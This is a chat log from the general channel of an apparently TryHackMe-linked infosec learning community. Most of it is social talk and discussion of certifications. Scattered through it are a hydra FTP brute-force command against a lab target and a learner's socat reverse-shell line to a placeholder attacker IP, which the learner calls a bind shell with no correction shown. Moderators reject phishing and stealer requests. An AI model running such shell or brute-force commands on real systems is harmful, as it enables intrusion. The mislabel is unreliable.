#general

1 messages · Page 129 of 1

outer portal
#

Hi guys

loud marlin
#

@slender scaffold got one engraved...

rapid merlin
#

Built my first machine today 💚

tawny magnet
#

the mean green machine?

crude stump
#

Green and white

#

Or tealish something

rapid merlin
sand trench
rapid merlin
tawny magnet
#

whats in it

crude stump
#

A v12

sand trench
#

dunno why shadow is such a huge fan of Onomatopoeia

rapid merlin
buoyant tree
#

beep beep

sand trench
#

beep beep boop beepity boop vrooom CREEE beep beep

#

love when computers used modems and sounded so neat

tawny magnet
#

I can hear a very high pitch noise in my router when under load

naive violet
sand trench
#

yeah computer sounds are neat and fun

cosmic pendant
buoyant tree
naive violet
cosmic pendant
#

ohh the 'good' old dayhs

naive violet
#

I need some decent linears, but I want like 5v3a

#

Enough to burn up a 7805 etc

slender scaffold
#

Terminator 3 could communicate via phone modem sounds lol

#

Gawd imagine how much backwards compatible they had to design that model before sending it

spare spear
#

i am new can someone teach me the basic

mossy river
tidal quartz
#

I really don't know how this will work out

sand trench
#

the pain of phone interface with terminals

tidal quartz
#

🔥

vocal gale
#

My title will remain forever 🫡🫡

sand trench
#

gobble gobble gobble

mossy river
#

Chippi chippi chappa chappa

slender scaffold
#

Is Texas De brazil worth the price tho

vocal gale
#

Because it's open salad bar and all you can eat meat

#

So if u can eat lots then it's worth it and it's a nice experience 😎

slender scaffold
#

Hmmmmm

#

Guess I should try when very hungry

vocal gale
#

You definitely should, better to go as a group 🥳

mystic turtle
#

Gm

slender scaffold
#

o/

blazing granite
#

It should be do brazil 😂

sand trench
#

lul

gloomy gulch
#

Anyone participating in cyberstorm?

sand trench
#

what that???

whole yew
slender scaffold
#

I dunno! It’s a lot of money! Lol

slender scaffold
whole yew
# slender scaffold I dunno! It’s a lot of money! Lol

so it's all you can eat. Waht they call the "market table" is probably the most expansive salad bar you've seen yet.... It's very possible to eat only from the market table and be satisifed. Lots of fancy cheeses, sides, and salad stuff. But the real star of the show is the meat brought around by the gauchos.

I recommend you try a little bit of everything on your first trip to one, and figure out what you like and what you really like.

slender scaffold
#

I hope I can eat enough. But to experience it I guess it’s good to try at least once!

copper oar
#

Hello guys man who have telegram groups here for cyber security

naive violet
#

We don't allow advertising of telegram groups here

boreal scarab
slender scaffold
#

My first time not going since I started

slender scaffold
#

Well defcon is my only vacation every year… I don’t have enough money to do anything else (I am underpaid)…. company doesn’t pay for it… I’m in desperate need of a real vacation

gaunt basalt
#

So what’s the deal with parrot os? I don’t know much about it other than people saying it’s better than Kali. Why exactly is that?

boreal scarab
#

Stay a little before or after, that way you can relax a bit

slender scaffold
#

I’m going to ask my company if they’ll send me or cover part but I doubt it

naive violet
clear jackal
#

Lol

#

It's not your box, it's our box

outer rivet
#

I like your name

boreal scarab
blazing granite
boreal scarab
outer rivet
boreal scarab
#

Tuxedo

buoyant tree
#

Finnaly getting used to wireshark

simple valve
blazing granite
sand trench
#

booo it should bounce back and forth

rapid merlin
#

whos down to start CTFs sometime soon ( this / next week )

#

I havent started any but want to get into it.

#

im on tryhackme currently.

crude stump
#

bro wireshark is frustrating fr

gaunt basalt
#

So parrot is just bs

#

Does it offer anything that Kali lacks?

quaint tinsel
#

is just light weight and more beginner friendly

slender scaffold
#

I finished my work tasks 🎶 time to head home early

sand trench
crude stump
#

ight

sand trench
#

with larger pcaps tshark is probably better for handling stuffs

#

but sometimes graphical wireshark is more useful

crude stump
#

Well it’s less of the graphical interface, it’s more of the amount of different cmds you can use

sand trench
#

anyways this shadow whadow is now going for the long forgotten forbidden technique called meep moop sleep sloop to the beep boop

buoyant tree
#

Who here's the resident gym person

mossy river
#

me

buoyant tree
# mossy river me

50 Lat pull down 60 pound
50 vertical chest 60 pound
50 triceps extension 30 pound
50 shoulder press 75 pound
50 horizontal leg press 100 pound

#

Is this a lot or less

#

Went to gym after a couple of months

mossy river
#

What are your sets?

buoyant tree
mossy river
#

Uhh, that's a very big difference

buoyant tree
#

did it all under 30 min

mossy river
#

What are you trying to do? Build muscle, build strength or a bit of both?

serene wren
#

I'm building a wife

#

The robotics is almost there

mossy river
# buoyant tree strength

So, for strength you want to lift heavy for little.
The recommended number is 5 for 5, meaning you do 5 heavy reps of 5 sets.
Then you want a 5 minute break between each set.

Now, this is more of an average number, this won't work for every workout and it will depend on the machine type.

#

You need to stop. This is not appropriate.

serene wren
#

Ah no talking about engineering

serene wren
#

How come we can't share memes

mossy river
#

Sexist comments and comments that will make community members uncomfortable is not appropriate @serene wren
This is an infosec learning space, PG13

buoyant tree
serene wren
#

Ah that wasn't point towards anyone it was just an engineering statement

#

My bad if it offended you

mossy river
buoyant tree
#

30 min

mossy river
#

You're really going to hurt yourself

buoyant tree
#

yeah, going to reduce it from tmrw

mossy river
#

This is what my Tuesday looks like, it takes around an hour

buoyant tree
#

Is that Obsidian?

buoyant tree
crude stump
#

took me a hour on one task 💀

mossy river
#

Right now you don't want to focus on Strength or Muscle Building.
My biggest tip to you is just focus on your form and ensuring that you are doing the workouts correctly.

Separate your days. For example, if you are working out for 4 days, you want one day for legs, chest and back, shoulders and biceps, abs/ core and chest.
*this is an example, you will need to research the muscle groups etc.

Create a simple workout and then pick up weights that you can lift in a controlled manour. For example, for hammer curls, you want to lift the weight up to the top and then slowly carry it down without learning forwards or backwards, moving your shoulders or shaking.

It will take time and you may even feel embarrassed but it's super important to build a strong foundation.

pearl depot
#

anyone good with splunk alert creations? I am trying to troubleshoot an alert i am making

mossy river
#

And don't be afraid to Google videos of people doing the exercises and even just picking up small weights and following the motion with the video.

crude stump
#

lordbee

mossy river
#

is that a room?

pearl depot
#

its not a room

crude stump
#

oh

pearl depot
#

its my own splunk instance

south shore
#

Hello !

crude stump
#

hello georgine

#

o

south shore
#

Hi

south shore
#

Or am i wrong

pearl depot
#

no

#

Just making an alert

south shore
#

Oh ok

south shore
pearl depot
#

in splunk

#

with spl

south shore
#

Splunk?

#

Spl?

#

Oh shit im dead

south shore
#

Keep it up

#

Im 15 but i do calisthenics in my home

#

Ngl i look jacked😎tipsfedora 😈

mossy river
#

I wish I had gotten into weight training a little earlier

crude stump
#

How much you lifting jabba

mossy river
#

I lost some muscle mass over the last couple of weeks because I wasn't eating properly 🥲

south shore
mossy river
crude stump
#

Hm

#

Dumbbells

mossy river
#

Incline bench? Bicep curls? Shoulder press?

south shore
#

What exercise tho

#

Shoulder press is always light weight

mossy river
#

Always

south shore
#

But biceps are heavy

crude stump
#

Bicep

mossy river
#

Bicep curls for 8 reps I can do around 14kg each hand

south shore
#

For me i dont do weight lifting but lastime it was 10kg

south shore
mossy river
#

20

molten sky
#

nah

south shore
#

Damn

molten sky
#

jabbas 14

mossy river
#

LOL

crude stump
#

💀

south shore
#

Fr?

crude stump
#

Yeah

molten sky
#

( no )

south shore
#

Ok good laughs out loudly

mossy river
#

I joined TryHackMe's community when I was 15

molten sky
#

time traveler

crude stump
#

Sure is

mossy river
#

Or 16, math is hard 😓

crude stump
#

Math sucks

south shore
crude stump
#

Even tho the world revolves around it

molten sky
#

man there really wasn't much going on before thm and htb

#

nothing organized at least

mossy river
south shore
mossy river
#

I didn't know how to use mobile phones until I turned around 14/15 then one day I woke up and I just knew a ton about technology

molten sky
crude stump
#

Hold on how does that work

mossy river
molten sky
#

i need a beer

crude stump
mossy river
#

I need to go to sleep 💤

south shore
molten sky
crude stump
#

You liar

#

13???

south shore
molten sky
#

everyone was 13/f/cali at one point

crude stump
#

What In the world

mossy river
#

I genuinely don't know.
I owned an Xbox One and I had a Windows phone, that was about it.

Then, I applied for computer science at school and I could write Python without really trying to learn the language lol

molten sky
mossy river
molten sky
#

when asl meant something other than american sign language

crude stump
mossy river
#

Back when I actively partook in Cyber I absorbed information like it was nothing

I was very good, wonder what happened ahah

crude stump
#

Did you forget it all?

south shore
#

I think not

mossy river
#

I still know most of it, it would probably take me a day or two before I could do difficult CTFs

I fell behind, I would be much further along if I didn’t burn out

south shore
#

@mossy river btw what is ur profession in cybersecurity

#

Bug hunting?

mossy river
#

I’m a University Student

south shore
#

Hmm

#

Yeah i forgot lol

mossy river
#

And I work at TryHackMe ofc

crude stump
mossy river
#

Love every second

crude stump
south shore
crude stump
#

It’s fighting back

molten sky
mossy river
#

Fully remote

south shore
crude stump
#

From home?

south shore
#

They have a headquarter

mossy river
#

Do they? Interesting

south shore
#

Yeah they post yt shorts at a place

#

They have t-shirts

#

Employees

#

Etc

crude stump
#

I mean that’s basically thm but no hq

south shore
#

Maybe

crude stump
#

They got shirts and stuff

south shore
#

Didnt know

mossy river
south shore
#

Nice

#

Ur place looks so clean lol

crude stump
#

That’s that black hat sweat shirt be careful

mossy river
#

Student housing ahah

south shore
#

@mossy river maybe You should go sleep

#

And me too

mossy river
#

Potentially

south shore
#

Its 3 am for me

#

Goodbye

#

I will sleep ig

mossy river
#

Gn

south shore
#

👋

crude stump
humble forum
#

some questions are so confusing

molten sky
#

"what is the meaning of life?"

true bay
molten sky
#

disappointed that fluff isn't online rn -- i wanted to know if he rememberd his thing ,-,

near hawk
#

I went a sleep at 9 and woke up now for it to be 2am now gotta go back to sleep 😦

#

As gotta get up in 4 hours

blazing granite
molten sky
#

man, i'm tired af for some reason

#

there's so much that i still gotta do

crude stump
blazing granite
gritty fern
#

Just used nano for the first time it its probably my favorite editor now

#

Never even used a terminal based editor before

molten sky
#

vim >

gritty fern
#

Never used either ill take a look

molten sky
#

once you figure out how to exit vim you get a special role on here

#

as you can see, nobody has it yet

gritty fern
#

LOL

pine stratus
gritty fern
#

Isnt it :wq?

pine stratus
molten sky
#

well that's one way

gritty fern
#

Never used and already know how to quit tipsfedora

buoyant tree
molten sky
#

there's like 37

#

just pulled that number outa nowhere but there's a bunch depending on what you wanna do and how you wanna do it

gritty fern
#

So pretty much an easy to learn, hard to master type of thing but for exiting a text editor

pine stratus
#

there is also :qall!

#

u should use that

#

always

molten sky
#

man i just want my prs to get merged

#

am impatient

pine stratus
#

is there in room ithm that teach more about sockets

#

wssss

buoyant tree
molten sky
#

im half tempted to pr something like that into hashcat after talking to em about those PRs the other day

midnight hazel
#

yo yo yo

#

@crude stump u alive

crude stump
#

Maybe

molten sky
#

damnit

#

we'll try again tm

midnight hazel
crude stump
#

Wsp

#

Nice color

#

Hello

molten sky
#

man y'all are boring

celest sedge
#

Howdy

prisma trout
candid meadow
#

here is some random quiz i made: imagine you are a ethical hacker (dont mind the imagine if you already are) and you were just taking a peek through someone's computer and find a ransomware named **acc.deleter** . what should you do?

option 1: delete that ransomware

option 2: lock that ransomware using hacking (or not)

option 3: leave that ransomware

whole yew
#

an ethical hacker wouldn't just randomly go poking through someone elses computer.

steady pewter
candid meadow
#

also am still learning how to be a ethical hacker

#

so i dont know some stuff

steady pewter
#

I know, it's just a bit of a sensitive topic here.

steady pewter
#

good effort though.

rapid merlin
#

hi. im testing out softwares i find on my buddys PC which he conseted me to do as I allow him to test stuff out on mine. Im using "blank grabber" and i was wondering if it is malware before i download. Thanks!

chilly veldt
#

@whole yew

whole yew
#

It's also highly unethical to use a grabber on a "friends PC"

sick lance
chilly veldt
#

I don't feel like going to work, good thing I could be at the office at 10 today

#

Worked from 7am till 5:30pm yesterday🥲

candid meadow
#

am so dumb

#

maybe i need some improvements... STILL

sick lance
candid meadow
wanton schooner
#

guys i did a mistake today

jaunty prairie
jaunty prairie
wanton schooner
#

bruh i recieved background verification check for my internship today

#

i was submitting my marksheets

chilly veldt
#

Luckily only 2 minutes for migration but 25 minutes of troubleshooting cause one of my support people had issues

wanton schooner
#

i mistakenly wrote 4th instead of 5th

#

i mailed them regarding this idk when they will reply

#

there are companies who are revoking offer nd i m so overthinking rn

jaunty prairie
#

seems like an honest simple mistake. I don't know much about your situation, but its not like you lied to gave mis leading info, you just messed up a number.

wanton schooner
#

yeah i mailed them quickly when i realised this

#

idk how are they gonna respond to this

#

if they get mad at me or something then i m done

jaunty prairie
#

I think you will be fine. it sounds like a simple typo and you caught it quickly

wanton schooner
#

yeah lets see i hope it goes well thanks for the convo

jaunty prairie
#

np. keep us up to date with your journey, and good luck!

wanton schooner
#

yeah thanksssssssss i will

rapid merlin
#

we already know eachothers info lol

#

nothing to hide

grim sparrowBOT
#

@rapid merlin has been warned.

brisk tree
#

Morning

jaunty prairie
#

☕ mornin

#

hows the water today?

rapid merlin
wooden totem
brisk tree
jaunty prairie
#

I seen some videos last night, thought of you right away. its so sad

brisk tree
#

This was at my apartment. The apartment next to me their whole balcony door smashed in

#

Was apparently the most rain here in 75 years

jaunty prairie
#

wowsers

sick lance
#

You took the rain with you kekw

brisk tree
#

The damage around me

sick lance
#

@rapid merlin

Can you change your about me please, this isn't the sort of stuff we'd like to promote in this community.

jaunty prairie
#

:(:(:( that is insane.

#

@sick lance I am not familiar with the weather in your neck of the woods. weird question. Have you ever experienced snow?

sick lance
#

Granted, it wasn't much.

#

Snow in Spring, only in Scotland.

brisk tree
#

It rarely snows in scotlanr anymore except deep in the countryside

brisk tree
sick lance
#

Glasgow doesn't get much snow, everywhere else does. kekw

jaunty prairie
#

In my parts of the world, we don't really have spring. Canada has
winter, you thought it was spring, winter v2.0, summer

brisk tree
sick lance
jaunty prairie
#

how long have you been in the UAE?

brisk tree
#

6 nearly 7 months

jaunty prairie
#

granted Scotland is a pretty large place, I don't want to sound ignorant and think that everyone knows everyone...but were you and scrubz friends IRL before you moved?

brisk tree
sick lance
#

There was almost a different server, but I left that before it all kicked off.

jaunty prairie
#

I like this community. Granted I am still VERY new to discord and don't fully understand everything yet. You guys are all really cool and helpful.

jaunty prairie
uncut cove
#

Hey everyone!

#

Hope everyone's enjoying the spring

wooden totem
#

It was snowing yesterday

uncut cove
#

can relate, the temperature fell by 18 degrees in last 2 days

jaunty prairie
#

its starting to warm up here. Was able to sit on my deck with a book and coffee last night, that made me happy

shy hull
#

do yall think its worth it for the premium

#

cause i ve been thinkin about it and idk if i should

wooden totem
#

Worth it, if you gonna be invested

jaunty prairie
#

try it for a month, see if you like it...I been on premium for 3 days now. no regrets

shy hull
#

i mean i have been studying for 3 years now but idk if i hsould get thm or htb

wooden totem
jaunty prairie
#

right now, I am enjoying THM more then xbox. If work didn't pay for it, I would have traded game pass for THM

wooden totem
#

Personal opinion

uncut cove
#

I have a question

Recently the max capacity of my battery was at 95% when I was on Windows. Now it's back at 100%.

I mean it may be miracle, but what can I check to be sure?

#

memory scans like malwarebytes don't show much, but it's not very reliable. I see a powershell log an hour ago

shy hull
#

probbaly a miscalc on the battery

#

miscalc = miscalculation

jaunty prairie
#

I just had a dumb moment. I knew I had LFI, but the question asked for the hostname of the machine. spent 5mins working on RCE, before saying duhhh /etc/hostname kekw

brisk tree
#

Everyones had to go off road to get round the flood

steel aspen
jaunty prairie
brisk tree
#

Will do

steel aspen
#

@brisk tree off road tesla is interesting

brisk tree
#

Better than it going in the flood ahaha would die

worn thorn
#

Those damages... Stay save.

grizzled relic
#

Am I missing something on my Kali OVPN for the "Exploiting FTP" room?? It's saying this when I enter the syntax "hydra -t4 -l mike -P /usr/share/wordlists/rockyou.txt -vV [IP] ftp"... After that it's telling me "File for passwords not found: /usr/share/wordlists/rockyou.txt"

#

but worked fine on attackbox ?

worn thorn
#

rockyou is compressed on kali

grizzled relic
#

any idea how I can fix it?

jaunty prairie
#

gzip -d file.gz

#

so in your case gzip -d /usr/share/wordlists/rockyou.txt.gz

grizzled relic
#

thank you so much

jaunty prairie
#

np

craggy wave
#

if anyone now how to make phishing sites for facebook pls teach me i rlly need it (or where can i learn it)

worn thorn
#

nope

naive violet
craggy wave
naive violet
#

?

craggy wave
#

my fb got hacked and fb support aint doing nothing so i need it to get my acc back

mystic geyser
naive violet
#

And making a phishing page won't get your facebook back at all?

craggy wave
craggy wave
naive violet
grim sparrowBOT
#

:hammer: rezo2131#0 has been banned.

naive violet
#

Seeya.

mystic geyser
#

Damn

naive violet
#

We don't tolerate illegal or unethical actions here.

mystic geyser
#

Makes sense

grizzled relic
#

that was satisfying

worn thorn
#

indeed.

wooden totem
#

I wish there was a website which advertised that it can hack people for you but it would actually just log everyone that tries in a public list

rapid merlin
#

Nah

#

That's illegal too

bold dawn
#

maybe making the info public, you'd have to probably make a way to get their info removed upon request

jaunty prairie
#

just put it in the ToS. lol

bold dawn
#

you'd have to get them to accept it

#

So a sign up service may work

mystic geyser
bold dawn
#

if the list was private, it would be no different than data storage on any website

#

my website uses a database containing information stored by users and companies. It is a private list that only myself can access

#

they allow private information access to those who need it for work to flow

#

think about a HIPAA compliant app that stores patient data. It technically stores that in a database, and while it may be encrypted, it is still a private list that can be accessed without compromising compliancy

spare spear
#

can anyone help me i have a quest dm me pls

sick lance
bold dawn
#

can you state your quest here first?

spare spear
#

bc i wanna sent an image

bold dawn
#

sorry will let you get this scrubz

sharp citrusBOT
sick lance
chilly veldt
#

gotta love administrative tasks

spare spear
chilly veldt
#

just vibing to music while plugging in data in an excel sheet

sick lance
worn thorn
#

music helps with everything blobheart

rapid merlin
jaunty prairie
naive violet
naive violet
chilly veldt
sick lance
spare spear
rapid merlin
#

Email? Phone number? Social media profiles?

naive violet
chilly veldt
rapid merlin
#

Thanksss

jaunty prairie
sick lance
#

I bought a Bestie Boys anthology, A-D.

I had to fight for the right to part E.

rapid merlin
#

Pretty sure that in my country, doxxing is illegal

naive violet
rapid merlin
#

Imma read the law

jaunty prairie
#

ACME IT SUPPORT LAWYER has entered the chat 😄

bold dawn
#

doxxing is something else. That would be I find NinjaJc here on discord, and dig to find personal details about him to either make public, or threaten to

bold dawn
#

usually that information is used to make threats towards one or their family

#

What we are discussing would be no different than the data Google stores about us, or you enter your name in a sign up form

chilly veldt
#

oh btw, james, me and a friend found quite a big vulnerability yesterday sip

bold dawn
#

I think the catch is some states like California need to have the ability to remove information if they decide

chilly veldt
#

can't say much about it

naive violet
worn thorn
#

data collection is a really weird topic. Some regulations just seem way too lose for me.

naive violet
naive violet
#

Yeah but don't break your NDA

chilly veldt
#

yeah of course

bold dawn
worn thorn
#

"yea we collect everything about you because insert sad excuse here. Trust us bro."
how about no.

bold dawn
#

lol

#

then don't sign up

#

they can only do that if you agree to it, legally

#

they can do it either way

#

but legally you have to agree to anything

hardy mica
#

eJPT is shit badge caught me offguard kekw

chilly veldt
#

cause it is 😎

#

I regret getting it ngl

hardy mica
#

nah good for a starting point

chilly veldt
#

narhh, too pricy for what you learn and the fact that you can pass it with no knowledge needed is not good for a cybersec cert

hardy mica
#

you spend 200 bucks for basic knowledge of THE BASIC of pentesting. Passing the exam just requires a cheatsheet

#

real problem with it is that is VERY VERY VERY slow

jaunty prairie
#

the instructors were monotone af.

hardy mica
chilly veldt
#

they are actually redoing all the learning materials because of that

hardy mica
#

they repeated the same thing 1958 times

chilly veldt
#

they are throwing out that one guy

hardy mica
#

tbh if they cut all the monotony , and reduce hours from 150 to , idk like 70

#

its way better

chilly veldt
#

and reduce the price

#

and make it so you don't have to pay 750 USD for the boxes

hardy mica
#

i payed it 200 usd

chilly veldt
#

you got access to all the learning material on INE?

hardy mica
chilly veldt
#

also the training boxes?

#

hmm

hardy mica
#

with 200 bucks you can follow all videos and train boxes for certification

jaunty prairie
#

my management team said the prices were really shifty.

#

when I took it, they gave us the 180 days and threw in the cert for half the price

hardy mica
#

hmmm idk , for me the problem was not the price , was the fact that a guy explained me how to use NMAP for 40hrs

#

but for sure there are different POV on prices

#

200bucks for certifications and labs seems fair to me

#

surely less heavy than OSCP

bold dawn
#

instead did the coursework for CBBH

#

and will test soon

hardy mica
chilly veldt
hardy mica
#

or did this for work

chilly veldt
hardy mica
chilly veldt
#

yee

#

I had only done like 1-2 ctfs

#

this was back in 2021

hardy mica
#

well kinda impressive

#

it took me 15 days tbh

#

and i had to watch that slow sheet for 10 hrs a day

chilly veldt
#

I did it in my thanksgiving vacation

hardy mica
#

well as i said before at least they explain you passive and active IG , BASIC (VERY BASIC) enumeration , and the basic of every tool

#

not so bad

chilly veldt
#

the junior pentesting path on thm teaches you more than eJPT

#

😄

jagged moon
#

I should take ejpt

bold dawn
#

CBBH seems like it goes pretty in depth

chilly veldt
bold dawn
#

def a good mid level cert

hardy mica
#

problem with HTB is that they write too much

jagged moon
chilly veldt
hardy mica
chilly veldt
#

you will not fail

#

lmao

jagged moon
#

Challenge accepted

hardy mica
#

in 24hr you have a BLACKBOX PT

#

and you can access to your cheat sheet

chilly veldt
#

oh, it's only 24hr?

#

when I took it it was 48 hours

jagged moon
#

Me and my random number generator

#

Will attempt to fail

chilly veldt
hardy mica
tawny magnet
chilly veldt
hardy mica
hardy mica
#

there is a guy who get a pause every 2 words

bold dawn
#

but I also have another web cert, and experience in web testing

hardy mica
#

if you are at 0 , its not so bad

#

if you have already experience , not worth it

bold dawn
#

I do like that it explains preventative measures to vulnerabilities

#

for CBBH I think it's worth it

#

even with experience

#

there are certain bypasses I learned that I hadn't used before

hardy mica
#

not sure basic

#

but patch : eJPT - CBBH seems fair to me tbh

jagged moon
#

This week is extra long for some reason

bold dawn
#

is JPT web focused?

#

i didn't think it was

#

i'd suggest PJWT from TCM, then CBBH

chilly veldt
#

or whatever it's called

hardy mica
# bold dawn is JPT web focused?

eJPT is web focused .
All depens on : how much money you want spend and what is your favourite learning process.
Surely PJWT is a valid alternative

mint palm
hardy mica
radiant saddle
#

how can i hack nasa

hardy mica
#

well done , you are now Nasa admin

radiant saddle
#

oh thanks mate

#

love u

hardy mica
#

no problem

bold dawn
hardy mica
#

eWPT should be the "EXPERT" level web application certification , but tbh i kinda doubt it . I think that OffSec offer more valid certification at "expert" level

hardy mica
random scroll
#

Hi

rapid merlin
#

"This certification exam covers Assessment Methodologies, Host and Network Auditing, Host and Network Penetration Testing, and Web Application Penetration Testing."

random scroll
#

Once I deploy the VM, and in my own vm, after connecting to VPN what should I do?

#

Should I also ssh connect?

rapid merlin
#

What do you WANT to do

random scroll
#

ssh tryhackme@macine_ip?

hardy mica
random scroll
hardy mica
#

ah , You are in the wrong channel

#

but wait let me take a look

rapid merlin
sick lance
rapid merlin
#

oh

hardy mica
#

@random scroll switch channel and write : the room and the task you want help

bold dawn
#
INE Security

eWPTX Certification
Web application Penetration Tester eXtreme

The eWPTX is our most advanced web application pentesting certification. The exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they w...

#

this is their expert

hardy mica
bold dawn
#

yeah lol

mint palm
#

but it’s better to have eJPT than no certs in my opinion

hardy mica
hardy mica
mint palm
mint palm
twin ridgeBOT
#

Gave +1 Rep to @mint palm (current: #264 - 19)

hardy mica
#

+rep @mint palm

jagged moon
tidal quartz
#

@hasty sand How does it look

jagged moon
tidal quartz
# jagged moon Which library are u using for all the colors and formatting etc?

Im not using any library, its all stdlib xD

# Initialize logger
class CustomFormatter(logging.Formatter):
    """Logging Formatter to add colors"""

    format = "%(message)s"
    FORMATS = {
        logging.DEBUG: format,  # White
        logging.INFO: format,  # Cyan
        logging.ERROR: format,  # Red
    }

    def format(self, record):
        log_fmt = self.FORMATS.get(record.levelno)
        formatter = logging.Formatter(log_fmt)
        return formatter.format(record)

# Create a logger object
logger = logging.getLogger(__name__)

# Configure logger
console_handler = logging.StreamHandler()
console_handler.setFormatter(CustomFormatter())
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)

CYAN = "\033[0;36m"
GREEN = "\033[0;32m"
RED = "\033[0;31m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
RESET = "\033[0m"
jagged moon
#

Can recommend rich in that case

tidal quartz
#

I try not to use any external dependencies

wooden totem
#

is that on tablet?

jagged moon
#

Very good for all exploit dev needs

jagged moon
tidal quartz
jagged moon
#

That would use python's logging right?

tidal quartz
shut hawk
#

logging is inbuilt

jagged moon
sick lance
#

I hate entering references.

jagged moon
shut hawk
jagged moon
#

I want to. But i don't want to

#

Does that make sense?

shut hawk
#

I can't teach it, not good enough yet

#

yes I have the same problem

jagged moon
#

Did discord change the font for code blocks?

#

Proper monospace font now

shut hawk
#
print("hello world")
#

hmmm

sick lance
#

Yes.

shut hawk
#

does look slightly different

tidal quartz
simple valve
tawny magnet
#

Zig gang

tidal quartz
#

nim

simple valve
#

i want to study CRTO but i dont want to at the same time

tawny magnet
jagged moon
jagged moon
#

Dear McCracken

#

And that's how i read your name now

naive violet
jagged moon
mossy river
#

@buoyant tree mind if I DM?

jagged moon
oak river
#

The difference in reverse and binding shells is that:

Reverse shells send output to us from the exectuion of commands on the target machine
Binding shells expect input from us on the target machine

#

Have I understood it correctly?

naive violet
#

No

jagged moon
#

The communication once the connection is made is biderictional. The difference is who listens and waits for who to connect

naive violet
#

They both expect input from you and send you the output

oak river
#

But on the revshell we listen

grizzled crystal
oak river
#

While on the binding they listen?

jagged moon
#

Yes

oak river
#

Why did they mention that revshells usually bypass firewall rules easier?

#

I mean in both scenarios we send data to the machine behind the firewall

naive violet
#

Inbound firewall rules generally block anything that they haven't made an exception for

oak river
#

Thank you both!

#

This was useful

#

Jeez the shell room is hardcore

#

And it's "easy" kekw

#

Feel my brain fried

jagged moon
#

You'll get the hang of it

#

Just keep notes

oak river
#

Without notes I am a lost soul

#

OneNote and Notepad/Notepad++ for the win

#

But I might start utilizing Obsidian

rapid merlin
#

Yeah i just started using Obsidian

#

And its a bit better than onenote

oak river
#

Basically Obsidian is probably the better notepad version

#

But notepad++ is also fire

rapid merlin
#

The obsidian GUI is much much better. What I liked about onenote is that it gave the source of the room where the content came from.

tidal quartz
jagged moon
cosmic pendant
cosmic pendant
tidal quartz
#

I can't believe the project is almost finished :O its only been 2 days

rapid merlin
#

What exact notes do yall make? Important things of every room yall do?

cosmic pendant
cosmic pendant
#

But that's good when you're learning.

#

EDR evasion things, bits/snippets of code depending what I'm doing

#

The VSCodium change, added labels to the code map, It's really really handy

jagged moon
devout palm
rapid merlin
#

Mhhh

versed coral
#

Is it possible to make my own box with a certain vunerability, then apply a patch to it to show how it was done/patched

rapid merlin
#

Room?

versed coral
#

sure

#

like a room i guess

rapid merlin
#

But for yourself, or as a room on tryhackme?

versed coral
#

yes

cosmic pendant
twin ridgeBOT
#

Gave +1 Rep to @jagged moon (current: #12 - 559)

cosmic pendant
gray sonnet
#

Obsidian is really that bad huh

cosmic pendant
gray sonnet
#

Oof good thing I got out early

versed coral
cosmic pendant
versed coral
#

1, VM, 2, some sort of server thatl host the vunrerability, 3, a way of updating the vunerabale bit of software that is vunerable when i want to patch it@?

sick lance
#

Is this homework?

rapid merlin
#

can anyone help me with the malware introductory? it keeps saying my SHA-256 Checksum is incorrect

cosmic pendant
rapid merlin
#

oh okay mb

versed coral
cosmic pendant
#

Only the most important thing 😄

versed coral
#

i guess my real simple question is, is there a way for me to create a room with these steps

gray sonnet
#

Well yes

versed coral
#

basicly doing Solar room with the log4j

gray sonnet
#

But unless it's unique to the THM platform, it's gonna remain private

versed coral
#

then a version where the patch has been implemented

cosmic pendant
#

snapshots?

versed coral
#

aka i think its 14.1 then 16.0?

#

might be

#

not sure of the term

gray sonnet
#

First come up with a killchain

oak river
gray sonnet
#

THEN think about how you're going to implement it

oak river
#

Like in reverse shells, we must unload a payload onto the victim machine, which will try to connect to us as we listen

#

But is better to bypass firewalls

versed coral
oak river
#

And in binding shells we deliver a payload to make the target machine listen for our commands

#

?

gray sonnet
#

I took forever to get shit working for my room

#

Lots of troubleshooting

versed coral
gray sonnet
#

Yes

versed coral
#

so im assuming by these replies, "yes"

#

😄

#

sweet

oak river
#

socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

This is a binding shell command, right?

gray sonnet
#

You can ask questions about your room dev there

sick lance
#

sigh

oak river
gray sonnet
#

Hey scrubz 👋

versed coral
#

Ola Scrubz 👋🏻

cosmic pendant
#

lol!

sick lance
#

When a mod is online

I've been here the whole time 😭

gray sonnet
versed coral
gray sonnet
#

Well mobile doesn't show me that

#

I blame discord

rapid merlin
versed coral
#

Its clearly the invisible photo 😄

twin ridgeBOT
#

➕ Gave the role Creators-Lounge to lucifer_1_

versed coral
#

Thanking you 🙂

rapid merlin
#

Wooo

oak river
#

What can you do with this creators lounge role

jagged moon
gray sonnet
oak river
#

I wonder about the day when I migrate completely to linux

#

I wonder what my daily would be

#

Debian/Ubuntu perhaps

#

Mint?

oak river
#

Maybe something minimalistic like XFCE GUI

#

Since it would also be less-likely to break

#

To those who install arch

#

Do you remember all of the commands, or just use the guide?

#

For installation that is

rapid merlin
#

I twice tried installing Arch with Hyprland, that is something you dont want to do again 🙂

oak river
#

What is hyprland

rapid merlin
#

A GUI.

normal fable
#

Xfce is nice

tidal quartz
gray sonnet
tidal quartz
#

Who cares!

simple valve
grizzled crystal
#

That's the best part!

#

fun times

rapid merlin
#

Just curious, which studies do this?

#

Computer science?

#

Because in my country its a bit different xd

devout palm
loud marlin
#

@boreal scarab piiing... u here ?

bold dawn
#

Anyone know if I can bypass a 413 error on my web server using FTP? Don't want to change the limitations anywhere but this one file upload form

#

php

loud marlin
#

can you split the file in smaller parts ?

cerulean coral
#

How do i connect to the attackbox via VNC/RDP?

loud marlin
#

ik you can change in php.ini max file upload size

bold dawn
#

I thought about that, and then I wondered if splitting and putting them back together would cause any issues

bold dawn
sick lance
bold dawn
#

and I need to allow 250mb at least lol

loud marlin
#

i think will not. you prob have files larger that thant on server. or might login as root will bypass it... idk

cerulean coral
sick lance
rapid merlin
#

(not on your keyboard)

loud marlin
bold dawn
#

the issue is I can't even get the post request, so whatever is done, needs to be done on the frontend somehow

loud marlin
#

hmm... them i think fastest will be change max upload or splitting

#

oh

bold dawn
#

Changing the max upload didn't work for some reason

loud marlin
#

changed in php.ini or ?

bold dawn
#

so the issue is the server is refusing to send a POST with that much data

#

php.ini

loud marlin
#

is it wordpress cms or ?

#

you have cpanel for that site? or try to change in .htaccess also

#

functions.php also

